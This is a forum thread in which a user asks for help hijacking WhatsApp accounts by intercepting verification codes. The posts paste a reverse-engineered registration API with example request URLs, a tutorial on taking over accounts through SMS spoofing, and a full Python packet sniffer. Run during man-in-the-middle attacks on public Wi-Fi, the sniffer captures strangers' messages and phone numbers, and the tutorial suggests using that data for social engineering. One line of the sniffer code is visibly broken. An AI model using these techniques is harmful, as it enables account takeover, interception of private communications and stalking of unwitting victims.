Jump to content

Help With Whatsapp Hack


lmfao

Recommended Posts

So I have heard that whatsap is not encrypted ( its an app like viber) and that when you sign up for a number hte code is generated within your phone sent to whatssapp servers and then sent to you. because it is not encrpted you can intercept it from your phone I have been trying to figure it out for days saw many links, does anyone have any advice ? here are two posts I found on the internet that might help. They used to have this thing where all you had to do was put your phone in airplane mode and the activation code would be in your outbox not sent, but that wont work anymore.

A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.

I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.

I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent)

I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right:

The first thing is the login-Name and the password needed to login:

Matching with reports from some other threads here and in other forums the login name I found was some sort of:

Code:

international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net

For example if you live in germany and having the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for germany without the 0's and the phone number without the 0.

The Password is set during the registration process but usually it is an transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transormation works but I have the code that does it.

I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s

I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?)

The second thing I searched for is the registration process.

With this I got so far that I got an Registration-Code and I also get the response from the Server that the account exists but I can't login because I hadn't enough time to look excatly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly

The registration process works this way: (no gurantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around)

0) All these API-Request are done with an User-Agent like:

Code:

WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00

The Code generating this is: http://pastebin.com/K79wrfnS

I used information I found in the web to fill the information for the Nokia C3-00.

As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you.

1) The first step ist requesting the Registration-code from the Server (the Code you get i.e. via SMS)

The API-call looks like this:

Code:

https://r.whatsapp.net/v1/code.php?cc=49&in=17612345&to=4917612345&lc=DE&lg=de&mcc=000&mnc=000&imsi=00000000000000&method=sms

The Arguments are as following:

cc = area code without 0's

in = number without first 0

to = number where the sms or call should go to (maybe security weakness?)

lc/lg = Language-Code(?) splittet up - e.g. DE_de goes to lc=DE&lg=de US_en would be lc=US&lg=en

mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"

-> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does)

The metod is maybe the most interesting thing.

There are 3 methods: self, sms and voice

When choosing sms you get the Code via SMS as you may know it, choosing voice you get a call at the to-number where it reads the code (I didn't test but it would match with informations you find at some other places in the web). I don't know what self exactly does and I didn't really looked for it because the SMS-Way seemed the best for me, especally because I just wanted to know my Code :>

The Answer after calling the API is an xml saying:

Code:

<code><response status="sucess-sent" result="30"></code>

What error-Messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with an specific error, it just closes the App when an error occurs if I'm right) ^^

Also you should get an sms (in case you used the method sms) at the "to" number conatining the WhatsApp-Code which looks like this:

Code:

WhatsApp code abc

abc is the necessary Code

2) With the given code you can then register your Whatsapp-Account

API-Call:

Code:

https://r.whatsapp.net/v1/register.php?cc=49&in=17612345&udid=asdf&code=abc

cc/in = the same as in code.php

udid = the calculated password as explained in the login-data

code = the just recieved WhatsApp-Code

The XML response looks like:

Code:

<register> <response status="ok" login="4917612345" result="new" /> </register>

The login-value is your login-Name for the connection and built like explained.

I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^

3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think.

API-call:

Code:

https://r.whatsapp.net/v1/exist.php?cc=49&in=17612345&udid=asdf

Parameters are the same like above.

Resonse when account with this number and pw exists:

Code:

<exist><response status="ok" result="4917612345" /></exist>

The result again gives the login-name for this account.

I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this)

The last thing I searced for before studing for my exams was the server connection.

It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like.

I think there are some small differences between the default XAMPP and the way WhatsApp does it.

But nevertheless the URL I found to where it tries to connect is:

Code:

socket://bin-short.whatsapp.net:5222

When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information.

When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server.

WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information.

The Login-Process in the WhatsApp-Code looks like:

Code:

out.streamStart(connection.domain, connection.resource);

System.err.println("sent stream start");

sendFeatures();

System.err.println("sent features");

sendAuth();

System.err.println("sent auth");

in.streamStart();

System.err.println("read stream start");

String challengeData = readFeaturesAndChallenge();

System.err.println("read features and challenge");

sendResponse(challengeData);

System.err.println("sent response");

readSuccess();

Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like:

Code:

send1();

send2DigestMD5Mechanism();

read1();

String challenge = read2Challenge();

send2SASLResponse(challenge);

send2UselessResponse();

read2Challenge();

read2();

send3();

read3();

send4();

send5();

-> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth.

Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.

Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU

Thats all I did up to now (or more exactly before my exams).

I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but eventhough I finished my exams two weeks ago I didn't found the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all

If some beta-testers are searched for the programm I would really like to test it from a hobby-programmer or more non-programmer point of view

PS: Eventhough I personally don't like it when people ask for forgiveness for their bad english I would like to do the same right now

I'm from Germany and not really good in languages. I really hope my text ist readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say )

and then I found this :

How to hack WhatsApp Messenger on Nokia, iPhone & Android

shareshareshareshare

WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.

In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.

The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.

Hack 1

Install WhatsApp on your device

WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.

WhatsApp now offers an alternative method of verification

Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.

Next we need to do some SMS-Spoofing

There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.

If you are using an iPhone use the following details in the SMS spoofer application.

To: +447900347295

From: +(Country code)(mobile number)

Message: (your email address)

If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.

You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Hack 2

The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.

You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/

Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.

Example

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

DYN:~/whatsapp# python sniffer.py wlan0

#########################

## whatsapp sniff v0.1 ##

#########################

[+] Interface : wlan0

[+] filter : tcp port 5222

To : ***********

Msg : Hello, I will send you a file.

To : **********

Filename : .jpg

URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg

From : ***********

Msg : Thanks file has been recieved, take this file too.

From : ***********

Filename : .jpg

URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg

Code

You can grab the code on the downloads page http://insanitypop.com/downloads/ or view it below:

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

#!/usr/bin/env python

import os

import sys

import scapy.all

import re

Previous_Msg = ""

Previous_Filename = ""

Files = []

Messages = []

Urls = []

def banner():

print "#########################"

print "## whatsapp sniff v0.1 ##"

print "## qnix@0x80.org ##"

print "#########################\n"

def whatsapp_parse(packet):

global Previous_Msg

global Previous_Filename

global Files

global Messages

global Urls

src = packet.sprintf("%IP.src%")

dst = packet.sprintf("%IP.dst%")

sport = packet.sprintf("%IP.sport%")

dport = packet.sprintf("%IP.dport%")

raw = packet.sprintf("%Raw.load%")

# Target Sending stuff

if dport == "5222":

Filename = ""

toNumber = ""

Url = ""

Msg = ""

try:

toNumber = re.sub("\D", "", raw)

if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]

else: toNumber = toNumber[5:16]

try:

Filename = raw.split("file\\xfc")[1][1:37]

Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]

except:pass

try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")

except:pass

except: pass

if(len(toNumber) >= 10):

if(len(Msg) >= 1 and Previous_Msg != Msg):

Previous_Msg = Msg

print "To : ", toNumber

print "Msg : ", Msg

Messages.append(Msg)

elif(len(Filename) >= 1 and Previous_Filename != Filename):

Previous_Filename = Filename

print "To : ", toNumber

print "Filename : ", Filename

print "URL : ", Url

Files.append(Filename)

Urls.append(Url)

# Recieved Messages

if sport == "5222":

Msg = ""

fromNumber = ""

Url = ""

Filename = ""

try:

fromNumber = re.sub("\D", "", raw)

if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]

else: fromNumber = fromNumber[5:16]

try:

Filename = raw.split("file\\xfc")[1][1:37]

Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]

except: pass

try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")

except: pass

except:pass

if(len(fromNumber) = 1 and Previous_Msg != Msg):

Previous_Msg = Msg

print "From : ", fromNumber

print "Msg : ", Msg

Messages.append(Msg)

elif(len(Filename) >= 1 and Previous_Filename != Filename):

Previous_Filename = Filename

print "From : ", fromNumber

print "Filename : ", Filename

print "URL : ", Url

Files.append(Filename)

Urls.append(Url)

def callback(packet):

sport = packet.sprintf("%IP.sport%")

dport = packet.sprintf("%IP.dport%")

raw = packet.sprintf("%Raw.load%")

if raw != '??':

if dport == "5222" or sport == "5222":

whatsapp_parse(packet)

def main():

banner()

if(len(sys.argv) != 2):

print "%s " % sys.argv[0]

sys.exit(1)

scapy.iface = sys.argv[1]

scapy.verb = 0

scapy.promisc = 0

expr = "tcp port 5222"

print "[+] Interface : ", scapy.iface

print "[+] filter : ", expr

scapy.all.sniff(filter=expr, prn=callback, store=0)

print "[+] iface %s" % scapy.iface

if __name__ == "__main__":

main()

Link to comment
Share on other sites

TLDR - But if the phone is wifi capable, switch it to wifi only mode, mitm the phone and run wireshark to see packets.

Link to comment
Share on other sites

Sorry , thank you for replying. I didnt orignally post links because I was not sure if I was allowed to but hte original link was : http://talk.maemo.org/showthread.php?t=81805&page=6

Morfir in simgple terms, I guess I am trying to intercept the code before it is sent out, make whatsapp think it was sent and then enter the code myself thus hacking into the account.

I have both an android os and a nokia x2

and yes I have heard that whatsapp is not encrypted here are some links:

http://www.andreas-kurtz.de/2011/09/shooting-messenger.html

http://whatsappfail.com/hijack-someone-elses-whatsapp

http://insanitypop.com/2012/01/how-to-hack-whatsapp-on-nokia-iphone-android/

digip- I am not familiar with wireshark have not used it, but the thing is I want to intercept it in my own phone without it being sent out, wireshark wouldnt do that it would ust show the packets

Link to comment
Share on other sites

Assuming that it's pushing packets in plain text, if not then you have a whole different problem.

Going by what the OP said, that it was unencrypted, so yes, if sent in the clear, you would see it, but if SSL/TLS or encrypted in some other manner, then no, but at least you would be able to find out by MITM the connection or intercepting some other way.

Could also try phone emulator, and see if you can drop the program on the emulator, and test from their, attach a debugger, pull memory for strings, etc.

Link to comment
Share on other sites

digip- I am not familiar with wireshark have not used it, but the thing is I want to intercept it in my own phone without it being sent out, wireshark wouldnt do that it would ust show the packets

Well, if you MITM the attack and can see the packets, you could also change them on the fly. Not sure if something like Burp suite or BEEF would work on a phone, but might be interesting to look into, even seeing if you can do the whole phone emulator thing and intercept the traffic, change what you want or drop what gets sent.

Link to comment
Share on other sites

Sorry I know I already posted this and its a long copy and paste, but is there a program within the phone itself like a nokia or an android where u could execute it?

or as the guy showed there was a url he used to connect and spoof the uid and number/connection : reference to post below"

API-Call:

Code:

https://r.whatsapp.n...d=asdf&code=abc

cc/in = the same as in code.php

udid = the calculated password as explained in the login-data

code = the just recieved WhatsApp-Code

The XML response looks like:

Code:

<register> <response status="ok" login="4917612345" result="new" /> </register>

The login-value is your login-Name for the connection and built like explained.

I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^

3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think.

API-call:

Code:

https://r.whatsapp.n...12345&udid=asdf

Parameters are the same like above.

Resonse when account with this number and pw exists:

Code:

<exist><response status="ok" result="4917612345" /></exist>

The result again gives the login-name for this account.

I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this)

The last thing I searced for before studing for my exams was the server connection.

It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like.

I think there are some small differences between the default XAMPP and the way WhatsApp does it.

But nevertheless the URL I found to where it tries to connect is:

Code:

socket://bin-short.whatsapp.net:5222

When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information.

When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server.

WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information.

The Login-Process in the WhatsApp-Code looks like:

Code:

out.streamStart(connection.domain, connection.resource);

System.err.println("sent stream start");

sendFeatures();

System.err.println("sent features");

sendAuth();

System.err.println("sent auth");

in.streamStart();

System.err.println("read stream start");

String challengeData = readFeaturesAndChallenge();

System.err.println("read features and challenge");

sendResponse(challengeData);

System.err.println("sent response");

readSuccess();

Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like:

Code:

send1();

send2DigestMD5Mechanism();

read1();

String challenge = read2Challenge();

send2SASLResponse(challenge);

send2UselessResponse();

read2Challenge();

read2();

send3();

read3();

send4();

send5();

-> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth.

Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.

Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...